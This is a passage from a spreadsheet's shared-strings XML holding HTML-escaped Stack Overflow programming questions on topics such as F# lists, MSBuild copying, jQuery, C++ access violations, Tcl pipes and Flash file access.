  </si>
  <si>
    <t>System.Collections.Generic List and F#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a C# class the returns a List, using System.Collections.Generic Lists not F# List&lt;/p&gt;
&lt;p&gt;I want to iterate though the list to find a object or not find it.  Here is how I would do it in C#.  How would I accomplish the similar thing in F#&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;foreach (AperioCaseObj caseObj in CaseList)
{
     if (caseObj.CaseId == "")
     {    
     }
     else
     { 
     }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Possible Causes for a Large Number of Sleeping Connections to a MySQL Server?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What are possible causes for a large number of sleeping connections to a MySQL Server? I'm using CodeIgniter with persistent connections disabled.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why is a char and a bool the same size in c++?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm reading &lt;em&gt;The C++ Programming Language.&lt;/em&gt; In it Stroustrup states that &lt;code&gt;sizeof(char) == 1&lt;/code&gt; and &lt;code&gt;1 &amp;lt;= sizeof(bool)&lt;/code&gt;.  The specifics depend on the implementation.  Why would such a simple value as a boolean take the same space as a char?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why doesn't MSBuild copy as I would expect</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm needing to script my build. I'm using MSBUILD because of it's integration with VS.net.  I am trying to copy some files from the build environment to the deployment folder. I'm using the copy task of MSBuild. But instead of copying the directory tree as I would expect. it copies all the contents into a single folder. I repeat all the files from the directory tree end up in one folder. I need it to copy the tree of folders and directories into the destination folder. Is there something I'm missing?&lt;/p&gt;
&lt;p&gt;Here is the relavant parts of my build script:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;PropertyGroup&amp;gt;
    &amp;lt;TargetFrameworkVersion&amp;gt;v2.0&amp;lt;/TargetFrameworkVersion&amp;gt;
    &amp;lt;Source&amp;gt;outputfolder&amp;lt;/Source&amp;gt;
    &amp;lt;DestEnv&amp;gt;x&amp;lt;/DestEnv&amp;gt;
    &amp;lt;DeployPath&amp;gt;\\networkpath\$(DestEnv)&amp;lt;/DeployPath&amp;gt;
&amp;lt;/PropertyGroup&amp;gt;
&amp;lt;ItemGroup&amp;gt;
    &amp;lt;TargetDir Include="$(DeployPath)\**\*" Exclude="**\web.config"&amp;gt;&amp;lt;/TargetDir&amp;gt;
    &amp;lt;SourceDir Include="$(Source)\**\*" /&amp;gt;
&amp;lt;/ItemGroup&amp;gt;    
&amp;lt;Target Name="Clean" &amp;gt;
    &amp;lt;!-- clean detail ... --&amp;gt;
&amp;lt;/Target&amp;gt;
&amp;lt;Target Name="migrate" DependsOnTargets="Clean"&amp;gt;
    &amp;lt;Copy DestinationFolder="$(DeployPath)" SourceFiles="@(SourceDir)" /&amp;gt;
&amp;lt;/Target&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Most efficient way to close a load() page using the X sign in jquery</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm new to Jquery and I'm trying to use a div container to load a URL, however, I want to give a user an option to close it with an X sign on the top right corner like in Amazon.com. What's the best way to accomplish this?&lt;/p&gt;
&lt;p&gt;Here's what I have and seems clumsy to figure out where the top right corner is and place the image X:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;$("#url_link_details").click(function() {
    $("#details").load("tooltip_address.htm", function() {
        $(this).addClass("openwindow").show();
        $(".img_close").addClass("img_close_show").show();
    })
});
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Any help is appreciated.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does Javadoc generate non-compliant XHTML?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I just pasted some generated javadoc into an eclipse project, to discover none of the HTML is compliant.&lt;/p&gt;
&lt;p&gt;There is even cases of closing tags that were never opened.&lt;/p&gt;
&lt;p&gt;Is there some way to fix this? Maybe a "be compliant" option...&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the "Operation Aborted" error in Internet Explorer?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I recently added JQuery's date-picker control to a project. In Internet Exploder, I get the following error message:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Internet Explorer cannot open the
  Internet site&lt;/p&gt;
  &lt;p&gt;&lt;a href="http://localhost/"&gt;http://localhost/&lt;/a&gt;&lt;/p&gt;
  &lt;p&gt;Operation aborted&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;What is causing this problem?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Visual Studio Solutions Folder as real Folders</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a Visual Studio Solution. Currently, it is an empty solution (=no projects) and I have added a few solution folders.&lt;/p&gt;
&lt;p&gt;Solution Folders only seem to be "virtual folders", because they are not really created in the Filesystem and files inside solution folders are just sitting in the same folder as the .sln file.&lt;/p&gt;
&lt;p&gt;Is there a setting that i've overlooked that tells Visual Studio to treat Solution Folders as "real" folders, that is to create them in the file system and move files into it when I move them inside the solution into one of those folders?&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Edit:&lt;/strong&gt; Thanks. Going to make a suggestion for VS2010 then :)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Equivalent to Windows getch() for Mac/Linux crashes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using &lt;code&gt;getch()&lt;/code&gt; and my app crashes instantly. Including when doing:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int main()
{
    getch();
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I can't find the link but supposedly the problem is that it needs to turn off buffering or something strange along those lines, and I still want &lt;code&gt;cout&lt;/code&gt; to work along with cross platform code.&lt;/p&gt;
&lt;p&gt;I was told to use &lt;code&gt;std::cin.get()&lt;/code&gt;, but I'd like the app to quit when a key is pressed, not when the user typed in a letter or number then press enter to quit.&lt;/p&gt;
&lt;p&gt;Is there any function for this? The code must work under Mac (my os) and Windows.&lt;/p&gt;
&lt;hr&gt;
&lt;p&gt;Linking/compiling is not an &lt;a href="http://stackoverflow.com/questions/267250/equivalent-to-getch-mac-linux-crash#comment14636199_267281"&gt;issue&lt;/a&gt;; I include &lt;code&gt;&amp;lt;curses.h&amp;gt;&lt;/code&gt; and link with &lt;code&gt;-lcurses&lt;/code&gt; in XCode, while Windows uses &lt;code&gt;&amp;lt;conio.h&amp;gt;&lt;/code&gt;.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>UIWebView within a ScrollView does not redraw</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have UIWebView within a UIScrollView. Then as I scroll, the web view displays first two pages correctly but does draws only half of the third the page. If I tap on the web view it draws the content or if I call &lt;code&gt;-[UIWebView reload]&lt;/code&gt; in &lt;code&gt;-scrollViewDidEndDecelerating&lt;/code&gt;, it shows the content. &lt;/p&gt;
&lt;p&gt;Is there any way I can make the web view draw correctly?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the best practices on MS-SQL when Windows Authentications is not an option?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the best option for a windows application that uses SQL server authentication? Should I create a single SQL account and manage the users inside the application (using a users table). Or should I create a SQL server account for each user. What is your experience? Thank you!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do you bind data to multiple columns in a list view?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a datasource that I want to bind to a listview that has multiple columns. How do I bind my datasource to that listview&lt;/p&gt;
&lt;p&gt;Here is some pseudo code that doesn't work to help illustrate what I am trying to do:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;MyDataTable dt = GetDataSource();
ListView1.DataBindings.Add("Column1.Text", dt, "MyDBCol1");
ListView1.DataBindings.Add("Column2.Text", dt, "MyDBCol2");
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;-- edit --&lt;/p&gt;
&lt;p&gt;Sorry, I forgot to mention it was winforms. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>TCL: Two way communication between threads in Windows</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need to have two way communication between threads in Tcl and all I can get is one way with parameters passing in as my only master-&gt;helper communication channel.  Here is what I have:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;proc ExecProgram { command } {
    if { [catch {open "| $command" RDWR} fd ] } {
        #
        # Failed, return error indication
        #
        error "$fd"
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;To call the tclsh83, for example ExecProgram "tclsh83 testCases.tcl TestCase_01"&lt;/p&gt;
&lt;p&gt;Within the testCases.tcl file I can use that passed in information.  For example:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;set myTestCase [lindex $argv 0]
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Within testCases.tcl I can puts out to the pipe:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;puts "$myTestCase"
flush stdout
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And receive that puts within the master thread by using the process ID:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;gets $app line
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;...within a loop.&lt;/p&gt;
&lt;p&gt;Which is not very good.  And not two-way.&lt;/p&gt;
&lt;p&gt;Anyone know of an easy 2-way communication method for tcl in Windows between 2 threads?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>query: cross product instead of join</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have two tables that I would like to join but I am getting an error from MySQL&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Table: books
bookTagNum ShelfTagNum
book1      1
book2      2
book3      2
Table: shelf
shelfNum   shelfTagNum
1          shelf1
2          shelf2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want my results to be:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;bookTagNum ShelfTagNum shelfNum
book1      shelf1           1
book2      shelf2           2
book3      shelf2           2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;but instead I am also getting an extra result:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;book1      shelf2           2
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I think my query is doing a cross product instead of a join:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;SELECT `books`.`bookTagNum` , `books`.`shelfNum` , `shelf`.`shelfTagNum` , `books`.`title`
FROM books, shelf
where `books`.`shelfNum`=`books`.`shelfNum`
ORDER BY `shelf`.`shelfTagNum` ASC
LIMIT 0 , 30
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;What am I doing wrong?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>.Access violation reading location</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've met a really strange problem.&lt;/p&gt;
&lt;p&gt;The code is as follow:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;::boost::shared_ptr&amp;lt;CQImageFileInfo&amp;gt; pInfo=CQUserViewDataManager::GetInstance()-&amp;gt;GetImageFileInfo(nIndex); 
Image* pImage=pInfo-&amp;gt;m_pThumbnail;
if(pImage==NULL)
    pImage=m_pStretchedDefaultThumbImage;
else
{
    //
    int sourceWidth  = pInfo-&amp;gt;GetWidth();
    int sourceHeight = pInfo-&amp;gt;GetHeight();
    int destX = 0,
        destY = 0; 
    float nPercent  = 0;
    float nPercentW = ((float)GetThumbImageWidth()/(float)sourceWidth);;
    float nPercentH = ((float)GetThumbImageHeight()/(float)sourceHeight);
    if(nPercentH &amp;lt; nPercentW)
    {
        nPercent = nPercentH;
        destX    = (int)((GetThumbImageWidth() - (sourceWidth * nPercent))/2);
    }
    else
    {
        nPercent = nPercentW;
        destY    = (int)((GetThumbImageHeight() - (sourceHeight * nPercent))/2);
    }
    int destWidth  = (int)(sourceWidth * nPercent);
    int destHeight = (int)(sourceHeight * nPercent);
    rcShowImage=CRect(rc.left+destX, rc.top+destY,rc.left+destX+destWidth,rc.top+destY+destHeight);
}
ASSERT(pImage != NULL); // passed assertion...
graphics.DrawImage(pImage,rcShowImage.left,rcShowImage.top,
rcShowImage.Width(),rcShowImage.Height()); // problem happened here.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I received the following exception:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;First-chance exception at 0x004095b0 in ec.exe: 0xC0000005: Access violation reading location 0xfeeefef2.
Unhandled exception at 0x004095b0 in ec.exe: 0xC0000005: Access violation reading location 0xfeeefef2.
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have checked the &lt;code&gt;pImage&lt;/code&gt;, I am sure when &lt;code&gt;graphics.DrawImage&lt;/code&gt; is called, it is not &lt;code&gt;NULL&lt;/code&gt;.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;why such a problem happened?&lt;/li&gt;
&lt;li&gt;What is &lt;code&gt;0xfeeefef2&lt;/code&gt;?&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>How to create a picture with animated aspects programmatically</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Background&lt;/p&gt;
&lt;p&gt;I have been asked by a client to create a picture of the world which has animated arrows/rays that come from one part of the world to another.   &lt;/p&gt;
&lt;p&gt;The rays will be randomized, will represent a transaction, will fade out after they happen and will increase in frequency as time goes on.  The rays will start in one country's boundary and end in another's.  As each animated transaction happens a continuously updating sum of the amounts of all the transactions will be shown at the bottom of the image. The amounts of the individual transactions will be randomized.  There will also be a year showing on the image that will increment every n seconds.&lt;/p&gt;
&lt;p&gt;The randomization, summation and incrementing are not a problem for me, but I am at a loss as to how to approach the animation of the arrows/rays.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;My question is what is the best way to do this?  What frameworks/libraries are best suited for this job?&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;I am most fluent in python so python suggestions are most easy for me, but I am open to any elegant way to do this.
The client will present this as a slide in a presentation in a windows machine.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java Instance Variable Accessibility</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is the difference in the accessibility of the following variables in Java?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public class Joe {
    public int a;
    protected int b;
    private int b;
    int c;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I'm most interested in what the last one is doing.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I prevent this System.IO.IOException when copying a file?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When I run the following code to test copying a directory, I get a System.IO.IOException when fileInfo.CopyTo method is being called. The error message is: "The process cannot access the file 'C:\CopyDirectoryTest1\temp.txt' because it is being used by another process."  &lt;/p&gt;
&lt;p&gt;It seems like there's a lock on file1 ("C:\CopyDirectoryTest1\temp.txt") which is created a few lines above where the error is occurring, but I don't know how to release this if so.  Any ideas?&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;using System;
using System.IO;
namespace TempConsoleApp
{
    class Program
    {
        static void Main(string[] args)
        {
            string folder1 = @"C:\CopyDirectoryTest1";
            string folder2 = @"C:\CopyDirectoryTest2";
            string file1 = Path.Combine(folder1, "temp.txt");
            if (Directory.Exists(folder1))
                Directory.Delete(folder1, true);
            if (Directory.Exists(folder2))
                Directory.Delete(folder2, true);
            Directory.CreateDirectory(folder1);
            Directory.CreateDirectory(folder2);
            File.Create(file1);
            DirectoryInfo folder1Info = new DirectoryInfo(folder1);
            DirectoryInfo folder2Info = new DirectoryInfo(folder2);
            foreach (FileInfo fileInfo in folder1Info.GetFiles())
            {
                string fileName = fileInfo.Name;
                string targetFilePath = Path.Combine(folder2Info.FullName, fileName);
                fileInfo.CopyTo(targetFilePath, true);
            }
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>OffTopic: Would you consider HTML + CSS + Webserver to be MVC?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;these are just my wonderings and I thought I'd share them...&lt;/p&gt;
&lt;p&gt;Simply put, MVC is the pattern for separating contents (model) from presentation (view), and having a mechanism in place (controller) defining how to gather both.&lt;/p&gt;
&lt;p&gt;If you already see where I am going at, I am very interested to hear your opinion on the matter. Of course, MVC applies to serverside mechanics and all, but think out of the box here with me for a second.&lt;/p&gt;
&lt;p&gt;"Visitors" of the web, both human and robot/Google will be likely to see HTML and what comes with it. Writing structured and meaningful HTML, together with separating it from presentation using CSS has become more important over the years, and future technology such as HTML5 only contributes to this separation by offering a more content-focused set of elements, and mechanisms for working with the pure visual representation.&lt;/p&gt;
&lt;p&gt;Considering all this, I was wondering if it would be correct in some way to say that the MVC paradigm applies to the front-end as well, where:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The model would be HTML, as in the pure httpwise contents that it has become&lt;/li&gt;
&lt;li&gt;The view being CSS; it makes your content be presented a certain way&lt;/li&gt;
&lt;li&gt;The controller being the webserver and all that lies underneath, it is what gathers and separates the model and view, and does all the decision making&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Makes sense? Not?&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Martin&lt;/p&gt;
&lt;p&gt;Update: VonC pointed me to an article that definitely changed my thoughts on the controller part. The browser takes up a major part of the controller too, as it handles a great deal of user interaction and how the model and view work together.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>java webstart decompiler</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there anyway to decompile java webstart application? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>To check whether the string value has numeric value or not in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am having an string like this&lt;/p&gt;
&lt;p&gt;string str = "dfdsfdsf8fdfdfd9dfdfd4"&lt;/p&gt;
&lt;p&gt;I need to check whether the string contains number by looping through the array.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET user control - can't get client-side (JavaScript) altered value back into control</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Ok guys and gals, here is my problem:&lt;/p&gt;
&lt;p&gt;I've built a custom control that uses a textbox to present data to the user. &lt;/p&gt;
&lt;p&gt;When the user interacts with the control the &lt;strong&gt;value of that textbox is altered with client side javascript&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;I also have a button on my page. When the user clicks the button I want to take the value from the custom control (aka. the textbox) and use it elsewhere.&lt;/p&gt;
&lt;p&gt;So, in the onClick event for the button I do something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;this.myLabel.Text = this.customControl.Value;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The problem is that the custom control does not have the new textbox value available. In the custom control the textbox is empty. However, I can see the correct value in the Request.Form collection.&lt;/p&gt;
&lt;p&gt;Am I doing something wrong here? Or should I be reading from Request.Form?!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How do I write a console application in Windows that would minimize to the system tray?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a written a Visual C++ console application (i.e. subsystem:console) that prints useful diagnositic messages to the console.&lt;/p&gt;
&lt;p&gt;However, I would like to keep the application minimized most of the time, and instead of minimizing to the taskbar, appear as a nice icon on the system tray. I would also like to restore the console when the system tray icon is clicked.&lt;/p&gt;
&lt;p&gt;How should I change my program to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Really Basic Graphics in C# 2.0 Tutorials</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I work for a ticketing agency and we print out tickets on our own ticket printer. I have been straight coding the ticket designs and storing the templates in a database. If we need a new field adding to a ticket I manually add it and use the arcane co-ordinate system to estimate where the fields should go and how much the other fields need to move by to accomodate new info.&lt;/p&gt;
&lt;p&gt;We always planned to make this system automate with a simple (I stress the word simple) graphical editor. Basically we don't forsee tickets changing radically in shape any time soon, we have one size of ticket and the ticket printer firmware is super simple because it's more of an industrial machine, it has about 10 fonts and some really basic sizing interactions.&lt;/p&gt;
&lt;p&gt;I need to make this editor display a rectangle of the dimensions by pixel of the tickets (can even be actual size) and have a resizable grid which can toggle between superimposition and invisibility on top of the ticket rectangle and represented by dots rather than lines.&lt;/p&gt;
&lt;p&gt;Then I want to be able to represent fields by drawing rectangles filled with the letter "x" that show the maximum size of the field (to prevent overlaps). These fields should be selectable, draggable and droppable in a snap to grid fashion.&lt;/p&gt;
&lt;p&gt;I've worked out the maths of it but I have no idea how to draw rectangles and then draw grids in layers and then put further rectangles full of 'x'es on top of those. I also don't really know much about changing drawn positions in accordance with mouse events. It's simply not something I've ever had to do.&lt;/p&gt;
&lt;p&gt;All the tutorials I've seen so far presume that you already know a lot about using the draw objects and are seeking to extend a basic knowledge of these things. I just need pointing in the direction of a good tutorial in manipulating floating objects in a picturebox in the first place.&lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Execute a JavaScript function in a C# application</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Without using a WebBrowser control, how could I execute a JavaScript function, that is decoupled from any browser DOM dependencies, in a C# application?  I am investigating implementing validation rules only once, for both server and client validation.  See &lt;a href="http://stackoverflow.com/questions/265343/automatically-duplicating-business-logic-on-web-client"&gt;this question&lt;/a&gt; for reference if you like.  Are there any JS interpretor libraries I could use?&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Addendum:&lt;/em&gt;
My goal here is to automatically deploy and invoke exactly the same validation logic on client and server, without communication between the two during the actual validation.  So, ideally I would code my validation logic in JavaScript, and render that to the page.  Alternatively, I could code my logic in C#, convert that to JavaScript using &lt;a href="http://projects.nikhilk.net/ScriptSharp/" rel="nofollow"&gt;Script#&lt;/a&gt;, and render that to the page.  &lt;/p&gt;
&lt;p&gt;I don't want separate validation functions being maintained client and server side, and I don't want AJAX calls to server validation functions, and I don't want client only or server only validation.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What are the differences / similarities between JBI and SCA</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Could point me to some good links, or share experiences of the differences / similarities between the JBI and SCA specifications?&lt;/p&gt;
&lt;p&gt;Many thanks :-)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Automatic BizTalk Versioning in My Build Process</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In all of my other .net apps my build process (a mixture of nant and custom tasks) automatically updates the [AssemblyVersionAttribute] AssemblyInfo.cs with the current build number before the call to msbuild, stamping in the build number in the version number.&lt;/p&gt;
&lt;p&gt;I'm now working on my first BizTalk project and I'd like to do the same thing with the version numbers of the BizTalk assemblies, but I've run into trouble!&lt;/p&gt;
&lt;p&gt;First of all the aseembly version numbers are stored in the btproj files, so I did some googling and found www.codeplex.com/biztalk which looked like the answer to my problem, but there is a deeper problem!&lt;/p&gt;
&lt;p&gt;I have a project for my schemas and another for my pipelines, the pipelines project references my schemas project as I have a flat file dis/assemblers. The problem comes when I update the version numbers, as updating them even from within visual studio does not update the pipeline components references to the schemas.&lt;/p&gt;
&lt;p&gt;So if I update all the version numbers manually in the VS IDE from 1.0.0.0 to 1.1.0.0, the build fails as the pipeline components flat file dis/assemblers still reference the old 1.0.0.0 version of the schemas! They don't automatically update!&lt;/p&gt;
&lt;p&gt;Is this really a manual process of updating the version numbers of the BizTalk projects in the property pages, then building the projects and manually updating the references to them in the properties of all the pipeline components that reference them?&lt;/p&gt;
&lt;p&gt;This means that I can't have my build process control the build number part of my version numbers!&lt;/p&gt;
&lt;p&gt;Or is there a better method of managing the version numbers of the BizTalk assemblies?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jQuery document.createElement equivalent?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm refactoring some old JavaScript code and there's a lot of DOM manipulation going on.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var d = document;
var odv = d.createElement("div");
odv.style.display = "none";
this.OuterDiv = odv;
var t = d.createElement("table");
t.cellSpacing = 0;
t.className = "text";
odv.appendChild(t);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to know if there is a better way to do this using jQuery. I've been experimenting with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var odv = $.create("div");
$.append(odv);
// And many more
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I'm not sure if this is any better.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it OK to return a KeyValuePair from a .NET function?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was just working on a function that I needed to return two values, one being a column name and one being the value of that column for that current row.  I am returning KeyValuePair(of String,Object).  I was wondering if this is a good idea or does it make it hard to read/use? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I monitor the active thread count of a process (jvm) on linux?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I would like to monitor the number of threads used by a specific jvm process on linux.
Is there an easy way to get this information without impacting the performance of the jvm process.&lt;/p&gt;
&lt;p&gt;More specifically I am interested in the number of threads per state.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Swing: Canvas overlaps menu</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a JFrame with a menu bar and a canvas covering all the remaining surface. When I click on the menu bar, the menu opens &lt;strong&gt;behind&lt;/strong&gt; the Canvas and I can't see it. Has anyone experienced this? Other than resizing the Canvas (which I am reluctant to do) is there any solution?&lt;/p&gt;
&lt;p&gt;Thanks,&lt;br/&gt;
Vlad&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Easy way to add a context action to Eclipse</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to add a very simple action to the context menu of Eclipse: clicking with right button over a folder object, this action should call an external tool (configured in the "External Tools") using the path of the folder as the only parameter.&lt;/p&gt;
&lt;p&gt;I've found a &lt;a href="http://www.eclipse.org/articles/article.php?file=Article-action-contribution/index.html" rel="nofollow"&gt;tutorial on how to add a context menu&lt;/a&gt;, but it's more complex than what I need -- I don't really want to create a plugin, I don't even want to create classes to do what I want. My only purpose is to call an external tool.&lt;/p&gt;
&lt;p&gt;How can I do it?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Accessing a ColdFusion datasource from Java code</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a servlet that I would like to run within ColdFusion MX 7. I would like to make use of an existing ColdFusion DSN as a javax.sql.DataSource, if possible.&lt;/p&gt;
&lt;p&gt;I thought something like &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;coldfusion.server.ServiceFactory.getDataSourceService().getDatasource(dsname);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;would work, but unfortunately the servlet returns&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;java.lang.NoClassDefFoundError: coldfusion/server/ServiceFactory
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Besides version control systems, are there any tools that support release management?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Most of the time, I've seen release management handled as a defined process with the supporting tool as the version control system (usually via branching and tagging). However, are there any tools dedicated to release management? I'm looking for both open source and closed source tools, if any exist.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the best way to store and search through object transactions?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We have a decent sized object-oriented application.  Whenever an object in the app is changed, the object changes are saved back to the DB.  However, this has become less than ideal.&lt;/p&gt;
&lt;p&gt;Currently, transactions are stored as a transaction and a set of transactionLI's.&lt;/p&gt;
&lt;p&gt;The transaction table has fields for who, what, when, why, foreignKey, and foreignTable.  The first four are self-explanatory. ForeignKey and foreignTable are used to determine which object changed.&lt;/p&gt;
&lt;p&gt;TransactionLI has timestamp, key, val, oldVal, and a transactionID.  This is basically a key/value/oldValue storage system.&lt;/p&gt;
&lt;p&gt;The problem is that these two tables are used for every object in the application, so they're pretty big tables now.  Using them for anything is slow.  Indexes only help so much.&lt;/p&gt;
&lt;p&gt;So we're thinking about other ways to do something like this.  Things we've considered so far:
- Sharding these tables by something like the timestamp.
- Denormalizing the two tables and merge them into one.
- A combination of the two above.
- Doing something along the lines of serializing each object after a change and storing it in subversion.
- Probably something else, but I can't think of it right now.&lt;/p&gt;
&lt;p&gt;The whole problem is that we'd like to have some mechanism for properly storing and searching through transactional data.  Yeah you can force feed that into a relational database, but really, it's transactional data and should be stored accordingly.&lt;/p&gt;
&lt;p&gt;What is everyone else doing?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can you emulate a mailing list in Django?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm on a project which is trying to write what amounts to a Mailing List app in Django, and we're running into a couple of problems/questions.&lt;/p&gt;
&lt;p&gt;The code we have so far doesn't set various List headers, and re-sets the To header to be the person we're sending it to, instead of the list address.&lt;/p&gt;
&lt;p&gt;Now, we can work our way through all these fiddly little details, but I was wondering if anyone had any code which already did this sort of thing that we could crib from, so that we don't have to go through all the trial-and-error ourselves.  Specific sections of RFCs that showed us what we should be sending would also be useful.&lt;/p&gt;
&lt;p&gt;Thanks,&lt;br/&gt;
Blake.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Getting directory listing using Flash</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In flash you can open a file on the user's computer. In flash 9 you can upload and download the file and in flash 10 you can access the contents of the file.&lt;/p&gt;
&lt;p&gt;It is secure because the user has to choose the file from a file dialog box to allow flash access to it.&lt;/p&gt;
